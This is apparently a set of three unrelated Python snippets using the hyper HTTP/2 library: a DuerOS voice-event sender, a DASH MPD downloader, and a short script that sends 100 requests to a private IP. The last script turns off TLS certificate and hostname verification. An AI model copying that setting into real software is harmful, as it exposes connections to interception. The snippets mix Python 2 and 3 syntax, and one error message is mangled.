stream_id = conn.putrequest(headers[':method'], headers[':path']) default_headers = (':method', ':scheme', ':authority', ':path') for name, value in headers.items(): is_default = name in default_headers conn.putheader(name, value, stream_id, replace=is_default) conn.endheaders(final=False, stream_id=stream_id) metadata = { 'clientContext': self.context, 'event': event } logger.debug('metadata: {}'.format(json.dumps(metadata, indent=4))) json_part = '--{}\r\n'.format(eventchannel_boundary) json_part += 'Content-Disposition: form-data; name="metadata"\r\n' json_part += 'Content-Type: application/json; charset=UTF-8\r\n\r\n' json_part += json.dumps(metadata) conn.send(json_part.encode('utf-8'), final=False, stream_id=stream_id) print '[DuerOS_SEND_1]:',json.dumps(metadata, sort_keys=True, indent=4,separators=(',',':')) if attachment: attachment_header = '\r\n--{}\r\n'.format(eventchannel_boundary) attachment_header += 'Content-Disposition: form-data; name="audio"\r\n' attachment_header += 'Content-Type: application/octet-stream\r\n\r\n' conn.send(attachment_header.encode('utf-8'), final=False, stream_id=stream_id) # AVS_AUDIO_CHUNK_PREFERENCE = 320 for chunk in attachment: conn.send(chunk, final=False, stream_id=stream_id) # print '===============send(attachment.chunk)' #print '[DuerOS_SEND_2]:',chunk # check if StopCapture directive is received while conn._sock.can_read: conn._single_read() while downchannel.data: framebytes = downchannel._read_one_frame() self.__read_response(framebytes, downchannel_boundary, downchannel_buffer) self.last_activity = datetime.datetime.utcnow() end_part = '\r\n--{}--'.format(eventchannel_boundary) conn.send(end_part.encode('utf-8'), final=True, stream_id=stream_id) print '[DuerOS_SEND_2]:',end_part logger.info("wait for response") resp = conn.get_response(stream_id) logger.info("status code: %s", resp.status) if resp.status == 200: self.__read_response(resp) elif resp.status == 204: pass else: logger.warning(resp.headers) logger.warning(resp.read()) if listener and callable(listener): listener()
def get_mpd(url): """ Module to download the MPD from the URL and save it to file""" global connection try: ssl_context = hyper.tls.init_context() ssl_context.load_cert_chain(certfile='/mnt/QUIClientServer0/cert.crt', keyfile='/mnt/QUIClientServer0/cert.key') ssl_context.load_verify_locations( cafile='/mnt/QUIClientServer0/cert.pem') parse_url = urllib.parse.urlparse(url) connection = hyper.HTTP20Connection(parse_url.netloc, ssl_context=ssl_context, force_proto='h2', secure=True) #connection.network_buffer_size= int(DOWNLOAD_CHUNK/10) #parse_url = urlparse.urlparse(url) ''' combine_url = str.join((parse_url.scheme, "://",parse_url.netloc)) config_dash.LOG.info("DASH URL %s" %combine_url) connection = urllib3.connection_from_url(combine_url) conn_mpd = connection.request('GET', combine_url) config_dash.LOG.info("MPD URL %s" %parse_url.path) ''' #connection = HTTPConnectionPool(parse_url.netloc) http2_conn = connection.request('GET', parse_url.path) mpd_conn = connection.get_response(http2_conn) except hyper.http20.exceptions.HTTP20Error as error: config_dash.LOG.error("Unable to download MPD file HTTP2 Error: %s" % error.code) return None except hyper.http20.exceptions.ConnectionError: error_message = "URLError. Unable to reach Server.Check if Server active" config_dash.LOG.error(error_message) print(error_message) return None except (IOError, httplib.HTTPException) as e1: message = "Unable to , file_identifierdownload MPD file HTTP Error." config_dash.LOG.error(message) return None #mpd_data = mpd_conn.read() #connection.close() mpd_file = url.split('/')[-1] t = [] i = 0 chunk_dl_rates = [] mpd_file_handle = open(mpd_file, 'wb') chunk_start_time = timeit.default_timer() segment_size = 0 chunk_number = 0 total_data_dl_time = 0 #how to use the API mpd_data = mpd_conn.read( int(DOWNLOAD_CHUNK) ) #<--- assign at the start to enter the while loop and read buffer # in units of chunks iteratively while mpd_data: #<--- segment_size += len(mpd_data) timenow = timeit.default_timer() chunk_dl_time = timenow - chunk_start_time chunk_start_time = timenow chunk_number += 1 total_data_dl_time += chunk_dl_time current_chunk_dl_rate = segment_size * 8 / total_data_dl_time chunk_dl_rates.append(current_chunk_dl_rate) t.append(i) mpd_file_handle.write(mpd_data) if (len(mpd_data) < DOWNLOAD_CHUNK): print("saw b:", len(t), "chunks:", chunk_dl_rates) #exit() break mpd_data = mpd_conn.read( int(DOWNLOAD_CHUNK )) #<--- reassign at the end to continue in the while loop # till we have response data #end of how to use the API mpd_file_handle.close() mpd_conn.close() #mpd_conn.release_conn() #config_dash.LOG.info(mpd_conn.data) config_dash.LOG.info("Downloaded the MPD file {}".format(mpd_file)) return mpd_file
import ssl import hyper # Custom SSLCONTEXT for not verifying SSLCertificate and Hostname # or need SSLCONTEXT for SNI support context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) context.verify_mode = ssl.CERT_NONE context.check_hostname = False context.set_alpn_protocols(['h2']) hyper.tls._context = context headers = { 'Host': '172.18.0.4', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'x': 'ciaociao' } headers2 = [('Upgrade-Insecure-Requests', '1')] conn = hyper.HTTP20Connection('172.18.0.4', port=443, ssl_context=context) for x in range(0, 100): conn.request('GET', '/', headers=headers) resp = conn.get_response() print(resp.read())